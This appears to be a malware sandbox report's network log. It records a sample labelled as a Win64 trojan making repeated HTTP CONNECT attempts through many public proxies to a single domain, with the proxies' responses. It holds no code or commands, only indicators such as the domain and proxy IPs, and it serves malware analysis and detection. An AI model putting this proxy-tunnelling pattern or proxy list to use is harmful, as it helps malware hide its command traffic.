                                                                                Feb 23, 2024 14:28:43.855031967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.531174898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:54.804109097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:04.244422913 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1305192.168.2.85389258.20.248.13990025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.829976082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.185786009 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1306192.168.2.854064104.16.106.65805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.830200911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.917654991 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:32 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1307192.168.2.853651148.72.177.9024665828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.830818892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.195000887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.615735054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.382666111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.898106098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382574081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.753305912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.492145061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1308192.168.2.85364624.172.82.94532815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.830826998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.898044109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.991925001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.992361069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1309192.168.2.853991109.194.22.6180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.831147909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1310192.168.2.853234185.236.37.10844435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.842674971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.633250952 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1311192.168.2.85397843.133.136.20888005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.870719910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1312192.168.2.85408694.74.120.1924435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.871459961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1313192.168.2.85409194.74.120.1924435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.875758886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1314192.168.2.853979202.131.159.5856785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.892055988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1315192.168.2.853962110.34.3.22931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.917114973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.541342020 CET90INHTTP/1.0 200 Connection Established
                                                                                Proxy-agent: Apache/2.4.54 (Win64) OpenSSL/1.1.1o


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1316192.168.2.85351227.75.149.16910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.917812109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1317192.168.2.85407974.103.66.15805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.948395967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.379125118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.785773993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.491905928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.695132971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.991863012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.288717985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1318192.168.2.854008159.192.139.17880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.948808908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.788902998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.999872923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.687056065 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1319192.168.2.851802146.56.101.184216815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.948812962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1320192.168.2.854085167.99.123.158594315828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:32.957062960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1321192.168.2.851854146.59.70.29511385828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.009197950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.194781065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.195421934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.195333958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1322192.168.2.8540531.15.62.1256785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.009267092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1323192.168.2.854072206.220.175.241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.010112047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1324192.168.2.85410894.74.120.1924435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.036521912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1325192.168.2.85373374.119.147.20941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.086616993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1326192.168.2.854060103.148.51.1980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.086714029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1327192.168.2.85358624.249.199.441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.087013006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1328192.168.2.853254162.240.10.35377615828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.092303038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.149532080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.255001068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.288947105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1329192.168.2.85411894.74.120.1924435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.094023943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1330192.168.2.85408791.202.230.21980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.095144033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1331192.168.2.85406527.76.128.246253955828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.137018919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1332192.168.2.854092190.14.224.24436295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.137542009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1333192.168.2.85368586.107.178.10731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.159146070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.195055962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.195456028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.195333004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:57.194854021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:09.194698095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:21.194693089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1334192.168.2.854109135.181.55.8131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.202721119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.613425016 CET84INHTTP/1.0 200 Connection established
                                                                                Proxy-agent: Kerio Control/9.4.3 build 8353


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1335192.168.2.85410593.117.72.27557705828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.210938931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1336192.168.2.851747117.160.250.163805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.228849888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.250505924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.308280945 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1337192.168.2.854137104.17.66.69805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.264141083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.351964951 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
